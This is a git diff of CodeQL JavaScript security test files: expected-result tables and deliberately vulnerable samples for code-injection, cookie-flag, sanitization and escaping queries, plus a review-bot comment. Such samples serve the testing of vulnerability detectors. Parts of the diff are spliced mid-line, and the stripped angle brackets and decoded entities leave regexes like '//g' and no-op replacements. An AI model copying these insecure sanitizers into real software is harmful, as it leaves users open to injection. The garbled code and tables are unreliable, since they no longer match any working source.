ing(1)) | tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:6:23:46 | atob(do ... ing(1)) | This code execution depends on a $@. | tst.js:23:11:23:32 | documen ... on.hash | user-provided value | -| tst.js:26:26:26:53 | locatio ... ring(1) | tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | This code execution depends on a $@. | tst.js:26:26:26:40 | location.search | user-provided value | -| tst.js:31:18:31:23 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:31:18:31:23 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:33:14:33:19 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:33:14:33:19 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:35:28:35:33 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:35:28:35:33 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:37:33:37:38 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:37:33:37:38 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | +| tst.js:1:6:1:83 | documen ... t=")+8) | tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | This code execution depends on a $@. | tst.js:1:6:1:27 | documen ... on.href | user-provided value | +| tst.js:3:12:3:33 | documen ... on.hash | tst.js:3:12:3:33 | documen ... on.hash | tst.js:3:12:3:33 | documen ... on.hash | This code execution depends on a $@. | tst.js:3:12:3:33 | documen ... on.hash | user-provided value | +| tst.js:11:10:11:74 | documen ... , "$1") | tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | This code execution depends on a $@. | tst.js:11:10:11:33 | documen ... .search | user-provided value | +| tst.js:13:21:13:42 | documen ... 
on.hash | tst.js:13:21:13:42 | documen ... on.hash | tst.js:13:21:13:42 | documen ... on.hash | This code execution depends on a $@. | tst.js:13:21:13:42 | documen ... on.hash | user-provided value | +| tst.js:15:30:15:51 | documen ... on.hash | tst.js:15:30:15:51 | documen ... on.hash | tst.js:15:30:15:51 | documen ... on.hash | This code execution depends on a $@. | tst.js:15:30:15:51 | documen ... on.hash | user-provided value | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:6:17:46 | atob(do ... ing(1)) | This code execution depends on a $@. | tst.js:17:11:17:32 | documen ... on.hash | user-provided value | +| tst.js:19:26:19:53 | locatio ... ring(1) | tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... ring(1) | This code execution depends on a $@. | tst.js:19:26:19:40 | location.search | user-provided value | +| tst.js:24:18:24:23 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:24:18:24:23 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:26:14:26:19 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:26:14:26:19 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:28:28:28:33 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:28:28:28:33 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:30:33:30:38 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:30:33:30:38 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | | webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | This code execution depends on a $@. | webix/webix.html:3:16:3:37 | documen ... 
on.hash | user-provided value | | webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:4:26:4:47 | documen ... on.hash | user-provided value | | webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:5:47:5:68 | documen ... on.hash | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected index 2be7dc659f29..ba973943e124 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected 
@@ -3,14 +3,14 @@ edges | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | provenance | | | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | provenance | | | eslint-escope-build.js:20:22:20:22 | c | eslint-escope-build.js:21:16:21:16 | c | provenance | | -| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | provenance | | -| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | provenance | | -| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | provenance | | -| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint | provenance | | -| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint | provenance | | -| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint | provenance | | -| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint | provenance | | -| express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | provenance | | +| express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | provenance | | +| express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | provenance | | +| express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... 
+ "];" | provenance | | +| express.js:19:9:19:35 | taint | express.js:20:34:20:38 | taint | provenance | | +| express.js:19:17:19:35 | req.param("wobble") | express.js:19:9:19:35 | taint | provenance | | +| express.js:27:9:27:35 | taint | express.js:36:15:36:19 | taint | provenance | | +| express.js:27:17:27:35 | req.param("wobble") | express.js:27:9:27:35 | taint | provenance | | +| express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | 
@@ -29,17 +29,17 @@ edges | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:32:16:32:22 | tainted | provenance | | | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:33:17:33:23 | tainted | provenance | | | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:18:9:18:31 | tainted | provenance | | -| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | provenance | | -| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | provenance | | -| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) | provenance | | -| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) | provenance | | -| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | provenance | | -| tst.js:29:9:29:82 | source | tst.js:31:18:31:23 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:33:14:33:19 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:35:28:35:33 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:37:33:37:38 | source | provenance | | -| tst.js:29:18:29:41 | documen ... .search | tst.js:29:18:29:82 | documen ... , "$1") | provenance | | -| tst.js:29:18:29:82 | documen ... , "$1") | tst.js:29:9:29:82 | source | provenance | | +| tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | provenance | | +| tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | provenance | | +| tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:11:17:45 | documen ... ring(1) | provenance | | +| tst.js:17:11:17:45 | documen ... ring(1) | tst.js:17:6:17:46 | atob(do ... ing(1)) | provenance | | +| tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... 
ring(1) | provenance | | +| tst.js:22:9:22:82 | source | tst.js:24:18:24:23 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:26:14:26:19 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:28:28:28:33 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:30:33:30:38 | source | provenance | | +| tst.js:22:18:22:41 | documen ... .search | tst.js:22:18:22:82 | documen ... , "$1") | provenance | | +| tst.js:22:18:22:82 | documen ... , "$1") | tst.js:22:9:22:82 | source | provenance | | nodes | NoSQLCodeInjection.js:18:24:18:31 | req.body | semmle.label | req.body | | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | semmle.label | req.body.query | 
@@ -64,24 +64,24 @@ nodes | angularjs.js:53:32:53:46 | location.search | semmle.label | location.search | | eslint-escope-build.js:20:22:20:22 | c | semmle.label | c | | eslint-escope-build.js:21:16:21:16 | c | semmle.label | c | -| express.js:7:24:7:69 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:7:44:7:62 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:9:34:9:79 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:9:54:9:72 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:12:8:12:53 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:12:28:12:46 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:15:22:15:54 | req.par ... ction") | semmle.label | req.par ... ction") | -| express.js:17:30:17:53 | req.par ... cript") | semmle.label | req.par ... cript") | -| express.js:19:37:19:70 | req.par ... odule") | semmle.label | req.par ... odule") | -| express.js:21:19:21:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | -| express.js:26:9:26:35 | taint | semmle.label | taint | -| express.js:26:17:26:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:27:34:27:38 | taint | semmle.label | taint | -| express.js:34:9:34:35 | taint | semmle.label | taint | -| express.js:34:17:34:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:43:15:43:19 | taint | semmle.label | taint | -| express.js:49:30:49:32 | msg | semmle.label | msg | -| express.js:50:10:50:12 | msg | semmle.label | msg | +| express.js:6:24:6:69 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:6:44:6:62 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:7:34:7:79 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:7:54:7:72 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:9:8:9:53 | "return ... 
+ "];" | semmle.label | "return ... + "];" | +| express.js:9:28:9:46 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:11:22:11:54 | req.par ... ction") | semmle.label | req.par ... ction") | +| express.js:12:30:12:53 | req.par ... cript") | semmle.label | req.par ... cript") | +| express.js:13:37:13:70 | req.par ... odule") | semmle.label | req.par ... odule") | +| express.js:14:19:14:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | +| express.js:19:9:19:35 | taint | semmle.label | taint | +| express.js:19:17:19:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:20:34:20:38 | taint | semmle.label | taint | +| express.js:27:9:27:35 | taint | semmle.label | taint | +| express.js:27:17:27:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:36:15:36:19 | taint | semmle.label | taint | +| express.js:42:30:42:32 | msg | semmle.label | msg | +| express.js:43:10:43:12 | msg | semmle.label | msg | | module.js:9:16:9:29 | req.query.code | semmle.label | req.query.code | | module.js:11:17:11:30 | req.query.code | semmle.label | req.query.code | | react-native.js:7:7:7:33 | tainted | semmle.label | tainted | 
@@ -105,25 +105,25 @@ nodes | template-sinks.js:31:19:31:25 | tainted | semmle.label | tainted | | template-sinks.js:32:16:32:22 | tainted | semmle.label | tainted | | template-sinks.js:33:17:33:23 | tainted | semmle.label | tainted | -| tst.js:2:6:2:27 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:2:6:2:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:5:12:5:33 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:14:10:14:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:14:10:14:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:17:21:17:42 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:20:30:20:51 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | -| tst.js:23:11:23:32 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:11:23:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| tst.js:26:26:26:40 | location.search | semmle.label | location.search | -| tst.js:26:26:26:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | -| tst.js:29:9:29:82 | source | semmle.label | source | -| tst.js:29:18:29:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:29:18:29:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:31:18:31:23 | source | semmle.label | source | -| tst.js:33:14:33:19 | source | semmle.label | source | -| tst.js:35:28:35:33 | source | semmle.label | source | -| tst.js:37:33:37:38 | source | semmle.label | source | +| tst.js:1:6:1:27 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:1:6:1:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:3:12:3:33 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:11:10:11:33 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:11:10:11:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:13:21:13:42 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:15:30:15:51 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | +| tst.js:17:11:17:32 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:11:17:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| tst.js:19:26:19:40 | location.search | semmle.label | location.search | +| tst.js:19:26:19:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | +| tst.js:22:9:22:82 | source | semmle.label | source | +| tst.js:22:18:22:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:22:18:22:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:24:18:24:23 | source | semmle.label | source | +| tst.js:26:14:26:19 | source | semmle.label | source | +| tst.js:28:28:28:33 | source | semmle.label | source | +| tst.js:30:33:30:38 | source | semmle.label | source | | webix/webix.html:3:16:3:37 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:4:26:4:47 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:5:47:5:68 | documen ... on.hash | semmle.label | documen ... on.hash | diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected index b8b29a028c25..db091b03406c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected +++ b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected 
@@ -1,8 +1,8 @@
-| tst-httpOnly.js:11:9:15:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. |
+| tst-httpOnly.js:11:9:15:2 | session ... lert\\n}) | Sensitive server cookie is missing 'httpOnly' flag. |
 | tst-httpOnly.js:29:9:29:21 | session(sess) | Sensitive server cookie is missing 'httpOnly' flag. |
 | tst-httpOnly.js:38:9:38:22 | session(sess2) | Sensitive server cookie is missing 'httpOnly' flag. |
 | tst-httpOnly.js:47:9:47:22 | session(sess3) | Sensitive server cookie is missing 'httpOnly' flag. |
-| tst-httpOnly.js:51:9:55:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. |
+| tst-httpOnly.js:51:9:55:2 | session ... lert\\n}) | Sensitive server cookie is missing 'httpOnly' flag. |
 | tst-httpOnly.js:68:5:73:10 | res.coo ... }) | Sensitive server cookie is missing 'httpOnly' flag. |
 | tst-httpOnly.js:78:5:81:10 | res.coo ... }) | Sensitive server cookie is missing 'httpOnly' flag. |
 | tst-httpOnly.js:101:5:101:43 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. |
@@ -12,9 +12,9 @@
 | tst-httpOnly.js:148:5:148:41 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. |
 | tst-httpOnly.js:159:5:159:43 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. |
 | tst-httpOnly.js:170:5:170:40 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. |
-| tst-httpOnly.js:209:37:209:51 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. |
-| tst-httpOnly.js:229:38:229:52 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. |
-| tst-httpOnly.js:289:37:289:59 | `authKe ... {attr}` | Sensitive server cookie is missing 'httpOnly' flag. |
-| tst-httpOnly.js:303:9:307:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. |
-| tst-httpOnly.js:320:9:324:2 | session ... tter\\n}) | Sensitive server cookie is missing 'httpOnly' flag. |
-| tst-httpOnly.js:330:37:330:68 | "sessio ... onKey() | Sensitive server cookie is missing 'httpOnly' flag. |
+| tst-httpOnly.js:208:37:208:51 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. |
+| tst-httpOnly.js:227:38:227:52 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. |
+| tst-httpOnly.js:287:37:287:59 | `authKe ... {attr}` | Sensitive server cookie is missing 'httpOnly' flag. |
+| tst-httpOnly.js:301:9:305:2 | session ... lert\\n}) | Sensitive server cookie is missing 'httpOnly' flag. |
+| tst-httpOnly.js:318:9:322:2 | session ... tter\\n}) | Sensitive server cookie is missing 'httpOnly' flag. |
+| tst-httpOnly.js:328:37:328:68 | "sessio ... onKey() | Sensitive server cookie is missing 'httpOnly' flag. |
diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected
index 96a48fec6cb8..22b3868a62a8 100644
--- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected @@ -18,25 +18,25 @@ | tst-multi-character-sanitization.js:83:7:83:63 | x.repla ... gi, "") | This string may still contain $@, which may cause an HTML element injection vulnerability. | tst-multi-character-sanitization.js:83:18:83:21 | | Missing result: Alert | +| polyfill-nocheck.html:4:9:4:98 | Content loaded from untrusted domain with no integrity check. | Unexpected result: Alert | diff --git a/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected b/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected index c97e109441dd..acafaf1a7be7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected +++ b/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected @@ -1,3 +1,4 @@ +#select | DynamicCreationOfUntrustedSourceUse.html:18:28:18:129 | ('https ... /ga.js' | Script loaded using unencrypted connection. | | DynamicCreationOfUntrustedSourceUse.html:21:26:21:50 | 'http:/ ... e.com/' | Iframe loaded using unencrypted connection. | | DynamicCreationOfUntrustedSourceUse.html:31:27:31:40 | getUrl('v123') | Iframe loaded using unencrypted connection. | @@ -5,3 +6,12 @@ | StaticCreationOfUntrustedSourceUse.html:6:9:6:56 | + {/* $ Alert[js/code-injection] */}
); diff --git a/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js index 72ea3df20038..5c31272ac5a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js @@ -1,7 +1,7 @@ function badEncode(s) { return s.replace(/"/g, """) .replace(/'/g, "'") - .replace(/&/g, "&"); + .replace(/&/g, "&"); // $ Alert } function goodEncode(s) { @@ -17,7 +17,7 @@ function goodDecode(s) { } function badDecode(s) { - return s.replace(/&/g, "&") + return s.replace(/&/g, "&") // $ Alert .replace(/"/g, "\"") .replace(/'/g, "'"); } @@ -27,7 +27,7 @@ function cleverEncode(code) { } function badDecode2(s) { - return s.replace(/&/g, "&") + return s.replace(/&/g, "&") // $ Alert .replace(/s?ome|thin*g/g, "else") .replace(/'/g, "'"); } @@ -44,20 +44,20 @@ function goodDecodeInLoop(ss) { } function badDecode3(s) { - s = s.replace(/&/g, "&"); + s = s.replace(/&/g, "&"); // $ Alert s = s.replace(/"/g, "\""); return s.replace(/'/g, "'"); } function badUnescape(s) { - return s.replace(/\\\\/g, '\\') + return s.replace(/\\\\/g, '\\') // $ Alert .replace(/\\'/g, '\'') .replace(/\\"/g, '\"'); } function badPercentEscape(s) { s = s.replace(/&/g, '%26'); - s = s.replace(/%/g, '%25'); + s = s.replace(/%/g, '%25'); // $ Alert return s; } @@ -67,7 +67,7 @@ function badEncode(s) { var indirect3 = /&/g; return s.replace(indirect1, """) .replace(indirect2, "'") - .replace(indirect3, "&"); + .replace(indirect3, "&"); // $ Alert } function badEncodeWithReplacer(s) { @@ -76,7 +76,7 @@ function badEncodeWithReplacer(s) { "'": "'", "&": "&" }; - return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&"); + return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&"); // $ Alert } // dubious, but out of scope for this query 
diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index 6f34830bf770..e18b45880bd3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js 
@@ -2,71 +2,71 @@ let express = require('express'); var app = express(); function bad1(s) { - return s.replace("'", ""); // $ Alert + return s.replace("'", ""); // $ Alert[js/incomplete-sanitization] } function bad2(s) { - return s.replace(/'/, ""); // $ Alert + return s.replace(/'/, ""); // $ Alert[js/incomplete-sanitization] } function bad3(s) { - return s.replace(/'/g, "\\'"); // $ Alert + return s.replace(/'/g, "\\'"); // $ Alert[js/incomplete-sanitization] } function bad4(s) { - return s.replace(/'/g, "\\$&"); // $ Alert + return s.replace(/'/g, "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad5(s) { - return s.replace(/['"]/g, "\\$&"); // $ Alert + return s.replace(/['"]/g, "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad6(s) { - return s.replace(/(['"])/g, "\\$1"); // $ Alert + return s.replace(/(['"])/g, "\\$1"); // $ Alert[js/incomplete-sanitization] } function bad7(s) { - return s.replace(/('|")/g, "\\$1"); // $ Alert + return s.replace(/('|")/g, "\\$1"); // $ Alert[js/incomplete-sanitization] } function bad8(s) { - return s.replace('|', ''); // $ Alert + return s.replace('|', ''); // $ Alert[js/incomplete-sanitization] } function bad9(s) { - return s.replace(/"/g, "\\\""); // $ Alert + return s.replace(/"/g, "\\\""); // $ Alert[js/incomplete-sanitization] } function bad10(s) { - return s.replace("/", "%2F"); // $ Alert + return s.replace("/", "%2F"); // $ Alert[js/incomplete-sanitization] } function bad11(s) { - return s.replace("%25", "%"); // $ Alert + return s.replace("%25", "%"); // $ Alert[js/incomplete-sanitization] } function bad12(s) { - return s.replace(`'`, ""); // $ Alert + return s.replace(`'`, ""); // $ Alert[js/incomplete-sanitization] } function bad13(s) { - return s.replace("'", ``); // $ Alert + return s.replace("'", ``); // $ Alert[js/incomplete-sanitization] } function bad14(s) { - return s.replace(`'`, ``); // $ Alert + return s.replace(`'`, ``); // $ Alert[js/incomplete-sanitization] } function bad15(s) { - 
return s.replace("'" + "", ""); // $ Alert + return s.replace("'" + "", ""); // $ Alert[js/incomplete-sanitization] } function bad16(s) { - return s.replace("'", "" + ""); // $ Alert + return s.replace("'", "" + ""); // $ Alert[js/incomplete-sanitization] } function bad17(s) { - return s.replace("'" + "", "" + ""); // $ Alert + return s.replace("'" + "", "" + ""); // $ Alert[js/incomplete-sanitization] } function good1(s) { @@ -130,23 +130,23 @@ function good12(s) { s.replace('[', '').replace(']', ''); s.replace('(', '').replace(')', ''); s.replace('{', '').replace('}', ''); - s.replace('<', '').replace('>', ''); // $ Alert - too common as a bad HTML sanitizer + s.replace('<', '').replace('>', ''); // too common as a bad HTML sanitizer - s.replace('[', '\\[').replace(']', '\\]'); // $ Alert - s.replace('{', '\\{').replace('}', '\\}'); // $ Alert + s.replace('[', '\\[').replace(']', '\\]'); + s.replace('{', '\\{').replace('}', '\\}'); s = s.replace('[', ''); s = s.replace(']', ''); - s.replace(/{/, '').replace(/}/, ''); // $ Alert - should have used a string literal if a single replacement was intended - s.replace(']', '').replace('[', ''); // probably OK, but still flagged + s.replace(/{/, '').replace(/}/, ''); // should have used a string literal if a single replacement was intended + s.replace(']', '').replace('[', ''); // $ Alert[js/incomplete-sanitization] - probably OK, but still flagged } function newlines(s) { // motivation for whitelist require("child_process").execSync("which emacs").toString().replace("\n", ""); - x.replace("\n", "").replace(x, y); // $ Alert - x.replace(x, y).replace("\n", ""); // $ Alert + x.replace("\n", "").replace(x, y); + x.replace(x, y).replace("\n", ""); } app.get('/some/path', function(req, res) { @@ -190,7 +190,7 @@ app.get('/some/path', function(req, res) { (function (s) { var indirect = /'/; - return s.replace(indirect, ""); // $ Alert + return s.replace(indirect, ""); // $ Alert[js/incomplete-sanitization] }); (function (s) { 
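Review bot: In the `@@ -130,23` hunk the justification comments outlive the expectations they explained: `s.replace('<', '').replace('>', ''); // too common as a bad HTML sanitizer` and the `// should have used a string literal if a single replacement was intended` line now read as if the statement is flagged, yet no `$ Alert` expectation remains, and `newlines()` keeps its `// motivation for whitelist` header while both of its expectations are dropped. Presumably these results come from a query other than js/incomplete-sanitization (the IncompleteMultiCharacterSanitization .expected file is updated in the same commit), but the test file no longer says which, so a reader cannot tell a deliberately unasserted line from a lost expectation. Rewording each such comment to state what is asserted, e.g. `s.replace('<', '').replace('>', ''); // not reported by js/incomplete-sanitization: too common as a bad HTML sanitizer`, would keep that intent visible; the same applies to `bad18NewRegExp` and the two `typicalBadHtmlSanitizers` declarations in the `@@ -330,27` hunk, whose "bad" names now carry no expectation at all. As a side note, `typicalBadHtmlSanitizers` is declared three times in this file (context in the `@@ -199,20` and `@@ -330,27` hunks); that predates this change but makes the per-function expectations harder to follow.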
@@ -199,20 +199,20 @@ app.get('/some/path', function(req, res) { }); function bad18(p) { - return p.replace("/../", ""); // $ Alert + return p.replace("/../", ""); // $ Alert[js/incomplete-sanitization] } function typicalBadHtmlSanitizers(s) { - s().replace(/[<>]/g,''); // $ Alert - s().replace(/[<>&]/g, ''); // $ Alert - s().replace(/[<>"]/g, ''); // $ Alert - s().replace(//g, ''); // $ Alert - s().replace(//g, '').replace(/&/g, ''); // $ Alert - s().replace(//g, ''); // $ Alert - s().replace(/&/g, '').replace(/>/g, '').replace(/]/g,''); + s().replace(/[<>&]/g, ''); + s().replace(/[<>"]/g, ''); + s().replace(//g, ''); + s().replace(//g, '').replace(/&/g, ''); + s().replace(//g, ''); + s().replace(/&/g, '').replace(/>/g, '').replace(//g, ''); // $ Alert + s = s.replace(/>/g, ''); s().replace(//g, '>').replace(/&/g, '&').replace(/"/g, '"'); s().replace(//g, '>').replace(/&/g, '&').replace(/'/g, '''); // OK - single quotes or double quotes both work @@ -306,7 +306,7 @@ function incompleteHtmlAttributeSanitization2() { } function incompleteComplexSanitizers() { - '=\'' + s().replace(/[&<>"]/gm, function (str) { // $ Alert + '=\'' + s().replace(/[&<>"]/gm, function (str) { if (str === "&") return "&"; if (str === "<") @@ -315,7 +315,7 @@ function incompleteComplexSanitizers() { return ">"; if (str === "\"") return """; - }) + '\''; + }) + '\''; // $ Alert[js/incomplete-html-attribute-sanitization] '="' + s().replace(/[&<>"]/gm, function (str) { if (str === "&") 
